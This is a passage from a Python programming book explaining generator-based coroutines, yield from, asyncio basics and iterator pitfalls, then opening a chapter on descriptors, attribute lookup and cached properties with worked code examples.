Here is where things get interesting. In the previous example, we are using a generator to retrieve the database values in batches of a fixed size. However, this value is fixed for the lifetime of the generator. What if you want to change it during the course of the generator's execution? The next() method does not possess the functionality to pass in parameters out of the box. That is where the send() method of the coroutine comes into the picture:

def fetch_db_data(db_conn):
    fetched_data = None
    last_batch_sz = 25
    try:
        while True:
            batch_sz = yield fetched_data
            if batch_sz is None:
                batch_sz = last_batch_sz
            last_batch_sz = batch_sz
            fetched_data = db_conn.fetch_records(batch_sz)
    except GeneratorExit:
        db_conn.close()

We have now configured the coroutine to accept values that are sent to it at runtime with the help of the send() method.

The usage of send() is how coroutines differ from regular generators, since now the yield keyword is used in the RHS of the expression, and the ‘yielded’ value is stored in a variable or an object.

The coroutines support the usage of yield on the right hand side of an assignment expression, as evident from the following example:

fetched_value = yield producer_value

Let us discuss how this works. The function of yield here is twofold – one, it will propagate the producer_value back to the caller, who will pick it up in the next iteration round, once next() has been invoked – and two, during the course of the execution, the caller might want to send a value as a parameter to the coroutine with the help of the send() method, which in turn becomes the result of the yield expression and is stored in the variable on the left-hand side (fetched_value here).

Note that you can only send a value to the coroutine when it is in the suspended state, waiting to yield the next value. This means that you cannot use this on the first invocation of a generator – you will have to use the next() method at least once to make it start generating values and enter a suspended state. Otherwise, an exception will be thrown, as is evident from the following:

In [1]: myCoroutine = SomeCoroutine()
In [2]: myCoroutine.send(10)
Traceback (most recent call last):
…
TypeError: can't send non-None value to a just-started generator

You cannot use the send() method on the first invocation of the generator. You have to use next() at least once to be able to send the values to it using the method.

In the example that we started with, we have updated it to accept the batch size that needs to be fetched from the database in an iteration. On invoking next() once, we advance to the yield line, a None is returned and the generator is suspended.

If we call next() again, the default initial value of the batch size is used – calling next() here is equivalent to calling send(None). However, if we invoke send() with a value, the next read from the database will use that value as the new batch size. This change can now happen at any point during the lifetime of the coroutine.

Given that Python encourages clean, compact code, we will see how we can update the previous example to be written in a better manner:

def fetch_db_data(db_conn):
    fetched_data = None
    batch_sz = 25
    try:
        while True:
            batch_sz = (yield fetched_data) or batch_sz
            fetched_data = db_conn.fetch_records(batch_sz)
    except GeneratorExit:
        db_conn.close()

This is much clearer – the parentheses around the yield make it explicit that we take the value received from the caller, falling back to the previous batch size when nothing (or None) is sent.

As mentioned earlier, the only catch is that we have to advance the coroutine with a next() before we can use the send() method on it. However, this is Python, and this is where miracles can happen. The first call seems like something many novice developers are prone to miss – so how can we make it run in a seamless manner so that we can use the send on the generator directly after creation?

Remember decorators? An interesting way to achieve this is to create a decorator that prepares your coroutine to be used after creation by advancing the coroutine. The usage of it would look like the following:

@prep_coroutine
def fetch_db_data(db_conn):
    fetched_data = None
    batch_sz = 25
    try:
        while True:
            batch_sz = (yield fetched_data) or batch_sz
            fetched_data = db_conn.fetch_records(batch_sz)
    except GeneratorExit:
        db_conn.close()

>>> datagen = fetch_db_data(DBConnection("sampledStats"))
>>> result = datagen.send(5)
>>> len(result)
5
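The body of prep_coroutine is not listed at this point; a minimal sketch of such a decorator, assuming its only job is to advance the freshly created generator once, could look like this:

from functools import wraps

def prep_coroutine(generator_func):
    """Hypothetical priming decorator: advance the coroutine to its first yield."""
    @wraps(generator_func)
    def wrapper(*args, **kwargs):
        coro = generator_func(*args, **kwargs)
        next(coro)   # prime it so that send() can be used immediately
        return coro
    return wrapper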

Can coroutines return values?

Coroutines differ from other regular iterators in the purpose for which they are used. Rather than being used for iteration, coroutines were conceptualized for providing an ability to suspend the code execution for a delayed wakeup. It provides a hibernation ability for the executing code.

While designing an efficient co-routine, one needs to focus more on the state suspension instead of the iteration. It can be a bit confusing to grasp at first since coroutines have their foundation in generators in Python. Thus, the core functionality of the coroutine would be to process information and then suspend the state of execution – you could think of them as lightweight threads (check out green threads that are scheduled by a run time library or VM instead of the OS). So, how about making them return values, similar to other methods, to enhance their usability?

Generators are very different from functions with respect to returning values. When we call a generator function, it simply creates the generator object, and no processing is done at that point. So, where will the value be returned? In the case of generators, the return is only possible after the iteration stops – once the StopIteration exception has been raised. What we do is store the value to be returned inside the exception object. When the caller catches it, they get the return value. Let us illustrate this with an example to make it clearer:

In [1]: def myGenerator():
…:      yield 101
…:      yield 102
…:      yield 103
…:      return 3000
…:

In [2]: datagen = myGenerator()
In [3]: next(datagen)
Out[3]: 101
In [4]: next(datagen)
Out[4]: 102
In [5]: next(datagen)
Out[5]: 103
In [8]: try:
…:     next(datagen)
…: except StopIteration as e:
…:     print("The returned value is ", e.value)
…:
The returned value is 3000

The preceding lean generator yields three values and returns one value. In order to access the return value, the user has to explicitly catch the exception. Another thing to note is that the returned value is precisely recorded under the attribute named value of the StopIteration exception.

Where do we use yield from?

The yield from construct (introduced in Python 3.3) helps to chain generators, combining nested for-loops into a single one. The result is a single continuous stream of values.

Let us understand this with a simple example. The itertools.chain() library method takes in a variable number of iterables and generates a single stream out of them. A simple implementation would look like the following:

def chain(*iterArgs):
    for iterable in iterArgs:
        for data in iterable:
            yield data

That is simple to understand – iterate through the iterables one at a time. The yield from construct can be used to directly generate the values from the coroutine, thereby resulting in a simpler code:

def chain(*iterArgs):
    for iterable in iterArgs:
        yield from iterable

In [1]: list(chain("string", ["liststr"], ("tuple", " of ", "strings.")))
Out[1]: ['s', 't', 'r', 'i', 'n', 'g', 'liststr', 'tuple', ' of ', 'strings.']

Note that the yield from construct works with any iterable, including the generator expressions.

We can now use this in a more practical example. Let us consider a case of a classic selection problem; most selection problems in statistics rely heavily on computation. Given a pair (n, k), if we need to write code to generate the sequence of powers n^0, n^1, …, n^k, using the preceding concepts, it would look like the following:

def generate_all_pows(n, k):
    yield from (n ** i for i in range(k + 1))

This seems more like an aesthetic uplift of the code, which is important as well.
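As a quick sanity check of the definition above (with illustrative values n=2 and k=4):

>>> list(generate_all_pows(2, 4))
[1, 2, 4, 8, 16]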

Another case of capturing returned value of generators

We have seen earlier that the return value of a generator is stored in the StopIteration exception object and retrieved by handling the exception. Take an example of what happens when we have nested generators, where each of the nested generators is equipped with a return value. Now, when we invoke the top-level generator, how will the return values of all the constituent generators be effectively returned using the yield from construct? Take a look at the following:

def series(identifier, begin, end):
    print("%s initiated at %i" % (identifier, begin))
    yield from range(begin, end)
    print("%s terminated at %i" % (identifier, end))
    return end

def supergen():
    data_generator_one = yield from series("series1", 1, 6)
    data_generator_two = yield from series(
        "series2", data_generator_one, 10)
    return data_generator_one + data_generator_two

Note that the return value from one generator is being used as an argument to the second generator in the sequence. If we were to now execute this script using the supergen top-level generator, the result would be as follows:

>>> mySuperGen = supergen()
>>> next(mySuperGen)
series1 initiated at 1
1
>>> next(mySuperGen)
2
>>> next(mySuperGen)
3
>>> next(mySuperGen)
4
>>> next(mySuperGen)
5
>>> next(mySuperGen)
series1 terminated at 6
series2 initiated at 6
6
>>> next(mySuperGen)
7
>>> next(mySuperGen)
8
>>> next(mySuperGen)
9
>>> next(mySuperGen)
series2 terminated at 10
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
StopIteration: 16

The yield from construct can thereby also be used for capturing the final value from the executed coroutine once it completes.

Hope that made the concepts of returning values clearer.

Another case of sending and receiving values from generators

We have also discussed the use of the send() method for injecting parameters to an active generator. Now we will look at how we can use the yield from construct to send and receive the values to and from the coroutine.

For an example here, let us consider a coroutine that is delegating to other coroutines, similar to the example in the previous section, while also preserving the logic to send values and raise the appropriate exceptions. This would be a seemingly complex operation. In the example, let's keep the supergen() method intact from the previous example; however, we will be modifying the series() generator to be able to receive parametric values and handle exceptions. The illustrative code would look something like the following:

def series(identifier, begin, end):
    result = begin
    print("%s initiated at %i" % (identifier, begin))
    while result < end:
        try:
            rec_val = yield result
            print("%s received %r" % (identifier, rec_val))
            result = result + 1
        except SpecificException as ex:
            print("%s is exception handling - %s" % (identifier, ex))
            rec_val = yield "DONE"
    return end

Let us execute the supergen() coroutine while also passing in values, and see how the results and exceptions behave as the series is produced:

>>> mySuperGen = supergen()
>>> next(mySuperGen)
series1 initiated at 1
1
>>> next(mySuperGen)
series1 received None
2
>>> mySuperGen.send("A Random Value")
series1 received 'A Random Value'
3
>>> mySuperGen.throw(SpecificException("A Random Exception"))
series1 is exception handling - A Random Exception
'DONE'
… # advance more times using next() or send()
series2 initiated at 6
6
>>> mySuperGen.throw(SpecificException("Another Random Exception"))
series2 is exception handling - Another Random Exception
'DONE'

One thing to note here is that we are ONLY sending the parametric values to the top-level supergen() coroutine (mySuperGen) and NEVER directly to series(). However, the nested series generators are still receiving the values. This is because they are being passed along by the yield from construct.

A little insight here – when the main coroutine generates its values, it will be suspended in one of the two subroutines at any given time. The one that is recently suspended handles the sent values and exceptions. When the first coroutine completes, its return value is passed to the second coroutine as an input. At any step, the send() call returns the value that the currently suspended coroutine has produced. When a handled exception is thrown, the series() returns the value DONE which is propagated to the calling supergen() object.

Asynchronous programming

An asynchronous program runs in a single thread of execution. There is a context switch taking place between the different sections of code, which we can control. In other words, you can save the state of memory and data in an atomic fashion before making a context switch.

With all the constructs we have learnt up to now, you can see that several coroutines can be scheduled for execution in a specific order, and we can switch between these coroutines once they are suspended, after the invocation of a yield on each of them.

The I/O operations can be parallelized in a non-blocking manner. You require a generator for handling the actual I/O in the time the coroutine remains suspended. The program can retrieve back control on the coroutine with the help of the yield statement that suspends and produces a value to the caller. However, the syntax of achieving this has evolved over time in Python. Coroutines and generators may fundamentally be the same, but they differ semantically.

Generators are created for efficient iterations, while coroutines are usually created for achieving non-blocking I/O operations.

When you have multiple coroutines, using the yield from keyword can result in multiple use cases, and we can write something like the following:

result = yield from iterable_or_awaitable()

It is not clear what is returned from iterable_or_awaitable(). It could be a simple iterable of strings, or it might be an actual coroutine. This could lead to complications later.

The typing system in Python was extended – before Python 3.5, coroutines were just generators with a @coroutine decorator applied, and they were to be called with the yield from syntax. Now, coroutine is a specific type of object. This required some syntax changes as well – the await and async def syntax was introduced. The await construct is used in place of the yield from statement and with ‘awaitables’ like coroutines. The async def construct is a new mechanism of defining coroutines, where instead of using the old decorator, we can create an object which will result in a coroutine on instantiation. This is still fundamentally in line with all that we have studied in this chapter. For an asynchronous program, we need an event loop (the asyncio standard library is the preferred option), which helps to manage a series of coroutines. The event loop possesses

its own scheduling mechanism that will accordingly invoke the constituent coroutines. Giving back control to the event loop is achieved with the await keyword for asynchronous processing. The event loop will resume the coroutine later, and a different coroutine can execute in the meantime.

Say for example, you have sent an HTTP request and are waiting for the response. You can use the preceding async coroutines to continue with the execution of other sections of the program while waiting for the HTTP response. Let us take another example of a program with multiple coroutines which illustrate the use of the asyncio module for achieving async execution:

import asyncio

async def summation(begin, end, wait):
    result = 0
    for i in range(begin, end):
        result += i
    # Wait for assigned seconds
    await asyncio.sleep(wait)
    print(f'Summation from {begin} to {end} is {result}')

async def async_main():
    task_one = loop.create_task(summation(5, 500000, 3))
    task_two = loop.create_task(summation(2, 300000, 2))
    task_three = loop.create_task(summation(10, 1000, 1))
    # Run the tasks asynchronously
    await asyncio.wait([task_one, task_two, task_three])

if __name__ == '__main__':
    # Declare event loop
    loop = asyncio.get_event_loop()
    # Run the code until completing all tasks
    loop.run_until_complete(async_main())
    loop.close()

If we now execute the preceding code in a script, we notice that task_three completes first, since its waiting time was the least.

>>> python test.py
Summation from 10 to 1000 is 499455
Summation from 2 to 300000 is 44999849999
Summation from 5 to 500000 is 124999749990

Thus, we see that generators demonstrate a core concept of the modern Python language, as there are several other programming constructs built on top of them. We will be looking at asynchronous programming in more detail in the later chapters.
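As a side note, on Python 3.7 and later the same orchestration is commonly written with asyncio.run() and asyncio.gather(), which manage the event loop for you; a minimal sketch of that style, reusing the summation coroutine defined above:

import asyncio

async def async_main():
    # gather schedules all three coroutines concurrently and waits for them
    await asyncio.gather(
        summation(5, 500000, 3),
        summation(2, 300000, 2),
        summation(10, 1000, 1),
    )

if __name__ == '__main__':
    asyncio.run(async_main())  # creates and closes the event loop internally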

Looping Gotchas

Loops are the simplest constructs you have been encountering in every programming language until now. In Python, when working on critical production worthy code, there are several trivia about the Pythonic loops and iterators that you absolutely need to keep in mind. Some of them are discussed in this section.

Exhausting an iterator

Consider a list of integers and a corresponding generator whose function is to square each integer in the list.

>>> integers = [1, 2, 3, 5, 7, 8, 9, 10]
>>> sq_integers = (x**2 for x in integers)

If you apply the list constructor to this, a list of all the squares of the numbers will be returned:

>>> integers = [1, 2, 3, 5, 7, 8, 9, 10]
>>> sq_integers = (x**2 for x in integers)
>>> list(sq_integers)
[1, 4, 9, 25, 49, 64, 81, 100]

If you now want to see the sum of these squares, we can try to apply the sum() function. We would be expecting a sum of 333, however if you execute this, the interpreter returns a value of 0.

>>> sum(sq_integers)
0

This happens because a generator is a single-use-only construct, and we have exhausted it while creating the list object from it. If you try it again, the result is empty.

>>> list(sq_integers)
[]

Generators are iterators…and iterators are single-use-only iterables. They’re like toothpaste tubes that cannot be reloaded.
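If you genuinely need to run over the values more than once, one option (besides itertools.tee() shown earlier) is to wrap the expression in a small function so that a fresh generator is produced on each call; a quick sketch:

def squares(numbers):
    return (x**2 for x in numbers)

integers = [1, 2, 3, 5, 7, 8, 9, 10]
print(list(squares(integers)))  # [1, 4, 9, 25, 49, 64, 81, 100]
print(sum(squares(integers)))   # 333 - a brand new generator, nothing exhausted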

Partially consuming an iterator

You also need to be aware of unwarranted partial uses of generators in checks and conditions. These are very difficult to debug as far as logical errors go.

Let us consider the previous example of the integers and squares to illustrate the following:

>>> integers = [1, 2, 3, 5, 7, 8, 9, 10]
>>> sq_integers = (x**2 for x in integers)

Now, if you have conditionals in your code that checks for, say, the existence of a particular square value in the squares list, Python will give you a positive response. However, if the same query is executed again, Python will return that it does not exist.

>>> 25 in sq_integers
True

Asking the same question again results in a False:

>>> 25 in sq_integers
False

In order to check the existence of an element in the generator, Python loops from the first element until it finds the required element or the generator is exhausted. In case of partial execution, the next query will begin from where the first query stopped.

>>> integers = [1, 2, 3, 5, 7, 8, 9, 10]
>>> sq_integers = (x**2 for x in integers)
>>> 25 in sq_integers
True
>>> tuple(sq_integers)
(49, 64, 81, 100)

Querying for the existence of an element in the iterator will partially consume the iterator. Since they are dynamically generated, you have to be careful of how you treat conditionals and existence on the iterator elements.
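When repeated membership checks are expected, one defensive option is to materialize the iterator once into a reusable container and query that instead; a small sketch:

integers = [1, 2, 3, 5, 7, 8, 9, 10]
sq_integers = set(x**2 for x in integers)  # consumed once, stored for reuse

print(25 in sq_integers)  # True
print(25 in sq_integers)  # True - the set can be queried any number of times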

Unpacking is also an iteration

Consider a dictionary which has the following key-value pairs. If we now try to loop over the entities, this will result in only the keys being printed:

>>> fruits = {'mangoes': 12, 'bananas': 21}
>>> for fruit in fruits:
…     print(fruit)
…
mangoes
bananas

You can also extract the data using the unpacking technique in Python using multiple assignment:

>>> a, b = fruits
>>> a, b
('mangoes', 'bananas')

Many novice programmers think that, logically, unpacking could return key-value pairs or raise an exception. However, the result is the same as before – only the keys of the dictionary are returned.

>>> a
'mangoes'

All loops in Python rely on the iterator protocol. It is the same case for unpacking values, which also makes use of the iterator protocol. Therefore, unpacking a dictionary is nothing but looping over the data structure.
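If the key-value pairs are what you actually want, iterating over the dictionary's items() view makes that explicit; a quick sketch reusing the fruits dictionary from above:

fruits = {'mangoes': 12, 'bananas': 21}

for fruit, count in fruits.items():
    print(fruit, count)          # mangoes 12, then bananas 21

(a, count_a), (b, count_b) = fruits.items()  # unpacking the items view works too
print(a, count_a)                # mangoes 12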

Conclusion

Generators are strewn all over Python and are a core component in the paradigm that makes efficient and simpler programs.

With time, we started using and relying on generators for more complex tasks, and supporting coroutines was one of them. While coroutines were built on generators, they are semantically different – while generators exist for creating performant iteration mechanisms, coroutines mainly exist to provide a robust mechanism of async operations in programs. The criticality of this distinction has made later versions of Python to evolve the coroutine type to full-fledged objects.

Iteration and async programming are among the key building blocks of core Python programming. In the next chapter, we will take a look at what descriptors in Python are, and how to make efficient use of descriptors in Python code.

Key takeaways

Sequences start with an index of zero, have a fixed length and can be sliced. Lists, Tuples, and Strings are Sequence Iterables in Python.

Iterators are dynamic objects and they do not have a pre-defined length, thereby you cannot index an iterator. Iterators return their own instance back when you call on them with the iter() method. In addition, iterators, by themselves, are also iterables, although they lack the extensive features that iterables have.

Not all iterables are iterators, but all iterators are iterables.

An alias for the next() method needs to be created which automatically redirects to the __next__ method. This will make your code independent of Python versions.

When you need more complexity and modularity in your iterators, choose the class based implementation to create iterators; if you need to pass in arguments, simply use generator functions, else generator expressions should suffice.

Prefer generator expressions to list comprehensions for simple iterations.

Use the close() method on generators for performing finish-up tasks when needed.

The usage of send() is how coroutines differ from regular generators, since now the yield keyword is used in the RHS of the expression, and the yielded value is stored in a variable or an object.

You cannot use the send() method on the first invocation of the generator. You have to use next() at least once to be able to send values to it using the method.

Note that the yield from construct works with any iterable, including generator expressions.

The yield from construct can thereby also be used for capturing the final value from the executed coroutine, once it completes.

Generator-based iterators are single-use-only. Be mindful of their complete or partial usage in the code.

Further reading

David Beazley, Generators: The Final Frontier, PyCon 2014.

PEP-342, Coroutines via Enhanced Generators.

Tarek Ziadé, Python Microservices Development.

Dimitri Racordon, Coroutines with Higher-Order Functions.

Michael Spivey, Faster Coroutine Pipelines.

CHAPTER 8 Python Descriptors

“If you are offered a seat on a rocket ship, don’t ask what seat.”

— Sheryl Sandberg

Python descriptors help to get, set, and delete attributes from an object's dictionary. When you access the class attribute, this starts the lookup chain. If the descriptor methods are defined in code, then the descriptor method will be invoked to look up the attributes. These descriptor methods are __get__, __set__, and __delete__ in Python.

In practical terms, when you assign or get a specific attribute value from a class instance, you might want to do some extra processing before setting the value of an attribute or while getting a value of the attributes. Python descriptors help you do those validation or extra operations without calling any specific method.

Structure

The key topics that we will be touching upon in this chapter include the following:

Types of descriptors – data and non-data.

Descriptor chains and accessing attributes.

Descriptor objects and how Python internally uses them.

Best Practices for using descriptors.

Benefits and use cases for Python descriptors.

Objectives

This chapter introduces a concept that is more advanced in Python development – descriptors. Moreover, descriptors are not something that the programmers of other languages are familiar with, so there are no easy analogies or parallelisms to make. Descriptors are another distinctive feature of Python that takes object-oriented programming to a new level, and their potential allows users to build more powerful and reusable abstractions. Most of the time, the full potential of descriptors is observed in standard libraries or frameworks that use them.

By the end of this chapter, you will be able to do the following:

Understand what descriptors are, how they work, and how to implement them effectively.

Analyze the two types of descriptors in terms of their conceptual differences and implementation details.

Learn how to write compact and clean Python code that is reusable and avoids duplicates.

Analyze the examples of good uses of descriptors within the Python language, and how to take advantage of them for creating our own library or API.

Python descriptors

Python objects which implement the methods of the Descriptor Protocol are referred to as descriptors. These descriptors provide the ability for creating objects that demonstrate special behaviour when invoked as attributes of other objects.

The descriptor protocol is constituted of the following method definitions:

__get__(self, obj, type=None) -> object

__set__(self, obj, value) -> None

__delete__(self, obj) -> None

__set_name__(self, owner, name)

We also differentiate between the type of descriptors based on which methods of the descriptor protocol they implement – if the descriptor only implements the __get__() method, we call it a non-data descriptor, however, if the __set__() or __delete__() method is implemented, it is referred to as a data descriptor. The difference is in the behaviour of the two types, and the data descriptor enjoys precedence over the non-data descriptors. We will look into these aspects in detail later in the chapter.

Let’s take an example of a logger defined using a descriptor:

class print_attr():
    def __get__(self, obj, type=None) -> object:
        print("retrieving value by accessing the attribute")
        return 45

    def __set__(self, obj, value) -> None:
        print("setting the value by accessing the attribute")
        raise AttributeError("Value could not be changed")

class Demo():
    myAttr = print_attr()

demo_obj = Demo()
var = demo_obj.myAttr
print(var)

Here, we have implemented the descriptor protocol for the print_attr class. When we instantiate it for an attribute of the Demo class, its behaviour as a descriptor is realized. The program binds the behaviour of the attribute to the dot notation, and whenever it is accessed, the __get__ method is automatically invoked and a message is logged to the console.

When the access invokes the __get__() method, it is configured to return a constant value – 45 here.

When the access invokes the __set__() method, an AttributeError exception is raised, which is how we define a descriptor that behaves in a read-only manner.

When we try running the preceding code in a script, we find that simply accessing the attribute invokes the getter in the descriptor.

>>> python descriptors.py
retrieving value by accessing the attribute
45

Descriptor types

Depending upon how the descriptors work, we can clearly demarcate the types of descriptors into data and non-data descriptors. As discussed earlier, if the descriptor implements the __delete__ or __set__ methods, it is referred to as a data descriptor, and if it only implements the __get__ method, we call it a non-data descriptor. The __set_name__ method has no impact on this categorisation. In terms of precedence, when you are resolving which attribute implementation to invoke, the data descriptors will have precedence over the object dictionary, while the non-data descriptors will be the other way round. In other words, for the non-data descriptor, if the name clashes with another key in the object dictionary, the descriptor will never be invoked.

Let us look into the intricacies of these in more detail in the following sections for each type of descriptor.

Non-data descriptors

Consider the usage of a descriptor that only implements the __get__ method:

class NonDataDescriptor:
    def __get__(self, instance, owner):
        if instance is None:
            return self
        return 45

class ClientClass:
    desc = NonDataDescriptor()

Therefore, when the attribute is accessed, the __get__ method is invoked and the results are returned:

>>> myObj = ClientClass()
>>> myObj.desc
45

Now, let us see how the precedence of this works. If we now try to set the value of this attribute and then try to access it, the descriptor will no longer be called. This is because a new key has been added to the object dictionary with the same name, and that takes precedence over the descriptor.

>>> myObj.desc = 25
>>> myObj.desc
25

To ascertain this fact even better, let us manually delete the descriptor from the object dictionary and try accessing it again:

>>> del myObj.desc
>>> myObj.desc
45

In addition, the descriptor is back in action. At any point, you can check whether the object dictionary has a key with the same name to assess the precedence, using the following:

>>> vars(myObj)
{}
>>> myObj.desc = 25
>>> vars(myObj)
{'desc': 25}

When the del keyword was used, it cleared out the desc key from the object dictionary, thereby defaulting to the defined descriptor.

Therefore, the non-data descriptors are read-only in nature. If you try to set a value to one, the new key in the object dictionary takes precedence and the descriptor will no longer be invoked. In order to suit your use case, you can enhance the functionality by defining a data descriptor, which can update the returned value during execution by implementing the __set__ magic method.

Data descriptors

Consider a descriptor that now implements the __set__ method and let us look at what happens to the precedence during runtime.

class DataDescriptor:
    def __get__(self, instance, owner):
        if instance is None:
            return self
        return 45

    def __set__(self, instance, value):
        print("%s.descriptor set to %s" % (instance, value))
        instance.__dict__["desc"] = value

class ClientClass:
    desc = DataDescriptor()

If you instantiate this class and try to access the object, the following happens:

>>> myObj = ClientClass()
>>> myObj.desc
45

What happens if you try to change the value to a different integer –

>>> myObj.desc = 22
>>> myObj.desc
45

If we dig deeper, we will notice that the value itself did not change, but the object dictionary was updated with the assigned value:

>>> vars(myObj)
{'desc': 22}
>>> myObj.__dict__["desc"]
22

The __set__ method seems to have done its job. However, in this case, we are using a data descriptor that takes higher precedence than the object dictionary. Therefore, we still get the old value on accessing the attribute. In addition, it is important to note that deletion of the attribute, unlike in the previous case, is not possible, since the attribute lookup still resolves to the descriptor, which does not implement __delete__ yet, hence an AttributeError is raised.

>>> del myObj.desc
Traceback (most recent call last):
…
AttributeError: __delete__

So, hoping that now the usage of the data and the non-data descriptors is clear in your mind. Another interesting fact that we notice is the way the __set__ method is setting the value:

myObj.__dict__["desc"] = value One question that would come to our mind if you really think about it – how did we know that we need to change the key called desc in the dictionary before it was even defined? Well, this was for illustration purposes only. In a real production scenario, you could do the following: Take the name of the parameter as an argument and store it in the init() method, so only the internal attribute is used. Or, this is where you get to use the __set_name__ method.

Another observation might be that we are accessing the __dict__ attribute in a direct and risky manner – wouldn’t doing something like the following be better?

setattr(instance, "desc", value) The reason you can’t do that is because calling the setattr() method internally calls the __set__ method, which would then

again call the setattr() and we would have an infinite recursive loop. Another option would be to keep the references to the client object in the descriptor – however, since the client class already has a reference to the descriptor, this would result in a circular dependency and thereby no garbage collection will ever take place on this (reference counts never drop). One possible way to resolve this is to make use of the weak references, which are handled with the weakref module in Python – this will create a weak reference key dictionary of the attributes.
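A minimal sketch of that weak-reference approach (names are illustrative, and it assumes the client instances are hashable and support weak references):

import weakref

class WeakStorageDescriptor:
    def __init__(self, default=None):
        self.default = default
        # Instances are used as keys but held weakly, so they can still be collected.
        self._values = weakref.WeakKeyDictionary()

    def __get__(self, instance, owner):
        if instance is None:
            return self
        return self._values.get(instance, self.default)

    def __set__(self, instance, value):
        self._values[instance] = value

class ClientClass:
    desc = WeakStorageDescriptor(default=45)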

The lookup chain and attribute access

In this section, we will dive a little deep into what happens when an attribute is accessed in Python. We know that each Python object has a __dict__ attribute built-in, which houses all the attributes of the objects. Let us look at this with the help of the following example:

class Animal():
    can_fly = False
    num_legs = 0

class Giraffe(Animal):
    num_legs = 4

    def __init__(self, name):
        self.name = name

my_pet = Giraffe("Jerry")
print(my_pet.__dict__)
print(type(my_pet).__dict__)

A new object is created and the __dict__ contents are printed to the console for the class and object. When we run the script, the following is what happens:

{'name': 'Jerry'}
{'__module__': '__main__', 'num_legs': 4, '__init__': <function Giraffe.__init__ at 0x000002054C5C00D0>, '__doc__': None}

Do note that everything in Python is an object type. Even a class is actually an object, so it also possesses a __dict__ attribute that contains all the attributes and methods of the class.

Now, we will look at what happens internally when an attribute is accessed, with the help of the previous example:

# lookup.py
class Animal(object):
    can_fly = False
    num_legs = 0

class Dog(Animal):
    num_legs = 4

    def __init__(self, name):
        self.name = name

my_pet = Dog("Enzo")
print(my_pet.name)
print(my_pet.num_legs)
print(my_pet.can_fly)

By running this piece of code, we would try to access and print the class and object attributes:

>>> python lookup.py
Enzo
4
False

The accesses in the three different prints are of the following types:

For the name attribute of the my_pet object, the __dict__ of the my_pet object is accessed to retrieve the value.

When the num_legs attribute is accessed on the my_pet object, the __dict__ of the Dog class is used to return the value.

When the can_fly attribute is accessed through the my_pet object, the __dict__ attribute of the Animal class is accessed.

This means that it is possible to rewrite the preceding example like the following:

# lookup.py
class Animal():
    can_fly = False
    num_legs = 0

class Dog(Animal):
    num_legs = 4

    def __init__(self, name):
        self.name = name

my_pet = Dog("Enzo")
print(my_pet.__dict__['name'])
print(type(my_pet).__dict__['num_legs'])
print(type(my_pet).__base__.__dict__['can_fly'])

When you test this new example, you should get the same result:

>>> python lookup.py
Enzo
4
False

Therefore, the question arises as to how the interpreter decides which attribute to pick up. This is where the concept of the lookup chain comes into the picture:

In order of precedence, the first result is retrieved from the __get__ method which is part of the data descriptor for the searched attribute.

Next, the key is searched for in the __dict__ of the object being used, and if found, the value is returned.

If that is unsuccessful, then the __get__ method of the attribute's corresponding non-data descriptor returns the value.

When that fails, the attribute key is searched for in the object type's __dict__ attribute, and a value is returned if it exists.

Upon the failure of the preceding step, the parent type's __dict__ is searched for the key and the value is returned if it exists. This step repeats for every parent type in the MRO (Method Resolution Order) hierarchy until all have been covered or a value has been found.

If nothing worked, an AttributeError exception is raised.

This shows the significance of classifying descriptors as data or non-data descriptors. Being present at different ranks in the lookup chain, they can affect the program behavior in different ways.

Descriptor objects and Python internals

For the seasoned object-oriented developers moving to Python, the examples discussed earlier for descriptors might seem like overkill – you could argue that the same feature can be achieved with the help of properties. This is definitely a viable option; however, in Python, properties are nothing but descriptors. In the following sections, we will be looking into several other uses of descriptors in Python.

Property objects are data descriptors

As discussed earlier, another direct approach to achieving the same results without explicitly defining the descriptor is to use a property. This is achieved through the property decorator. The following example for logging a property access demonstrates the use:

class Demo():
    @property
    def attr_one(self) -> object:
        print("Getting the value from property")
        return 45

    @attr_one.setter
    def attr_one(self, value) -> None:
        print("Setting the value for the attribute")
        raise AttributeError("RO: Value change not allowed.")

myObj = Demo()
result = myObj.attr_one
print(result)

Here, we make use of decorators to create the property. However, decorators are simply syntactic sugar. This example can also be written without using the decorators explicitly, simply using functions instead:

# prop_fun.py
class Demo():
    def get(self) -> object:
        print("Getting the value from the attribute")
        return 45

    def set(self, value) -> None:
        print("Setting the value for the attribute")
        raise AttributeError("RO: Value change not allowed.")

    attr_one = property(get, set)

myObj = Demo()
result = myObj.attr_one
print(result)

This time we ditch the decorator for creating the property, and use the property() function, whose signature looks like the following:

property(fget=None, fset=None, fdel=None, doc=None) -> object

The property() call results in an object that implements the descriptor protocol. The fget, fset, and fdel parameters are used internally to create the implementations of the __get__, __set__, and __delete__ methods.

Creating a cached property with descriptors

A property whose value is only computed if it has not already been computed before is referred to as a cached property. Once computed, the result should be persisted or cached, for faster retrievals in the subsequent access requests.

class CachedProperty:
    def __init__(self, func):
        self.func = func

    def __get__(self, instance, owner):
        func_result = self.func(instance)
        instance.__dict__[self.func.__name__] = func_result
        return func_result

Let us see this CachedProperty decorator in action:

class Demo:
    @CachedProperty
    def value(self):
        print('Using the method to compute the value!')
        return 84
    # NOTE: value = CachedProperty(some_function) would also work, as long as
    # the function's __name__ matches the attribute name, since that name is
    # used as the cache key in the instance __dict__.

>>> demo = Demo()
>>> vars(demo)
{}
>>> demo.value
Using the method to compute the value!
84
>>> vars(demo)
{'value': 84}
>>> demo.value
84

Note from the results that only the first access of the property calls the underlying method to compute the value. Post that, the vars, i.e. the contents of the instance __dict__, is updated with the value, and any subsequent access retrieves the value from this dictionary. So, what caused this behaviour? Let us fall back to the attribute access mechanism for what happened when the property was accessed for the very first time:

First, the Demo class and its hierarchy were checked for value as a data descriptor – it is not one, since CachedProperty only implements __get__.

Next, the __dict__ of the demo instance was searched for the value key – it was empty.

Finally came the check for the non-data descriptor – which caused the function to be called, and the result to be cached and returned.

The next time we try to access value, in the same order, the __dict__ of the instance generates a hit for the cached value, which is then returned directly.

Cached properties are extensively used in the Django library, which comes with a built-in implementation, django.utils.functional.cached_property. One use case where this is particularly useful is creating properties whose values come from time-consuming queries or computations.
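As a side note, since Python 3.8 the standard library ships an equivalent, functools.cached_property; a minimal sketch of its use (the class and the computation here are placeholders):

from functools import cached_property

class Report:
    @cached_property
    def totals(self):
        print('Running the expensive aggregation once!')
        return sum(range(1_000_000))  # stand-in for a slow query or computation

report = Report()
report.totals  # prints the message and computes the value
report.totals  # served straight from the instance __dict__, no recomputation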

Python descriptors in methods and functions

